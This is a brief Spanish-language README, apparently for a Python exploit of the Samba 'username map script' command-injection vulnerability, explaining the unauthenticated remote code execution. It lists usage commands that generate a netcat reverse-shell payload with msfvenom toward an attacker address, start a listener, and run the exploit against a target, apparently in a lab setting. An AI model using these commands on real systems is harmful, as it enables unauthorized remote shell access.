
Exploit en Python para la inyección de comandos en 'username map script' de Samba 3.0.20-3.0.25rc3, que proporciona ejecución remota de código sin autenticación y shell inversa.
Este módulo explota una vulnerabilidad de ejecución de comandos en las versiones de Samba 3.0.20 hasta 3.0.25rc3 cuando se utiliza la opción de configuración no predeterminada "username map script". Al especificar un nombre de usuario que contenga metacaracteres de shell, los atacantes pueden ejecutar comandos arbitrarios. ¡No se necesita autenticación para explotar esta vulnerabilidad, ya que esta opción se utiliza para mapear nombres de usuario antes de la autenticación!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
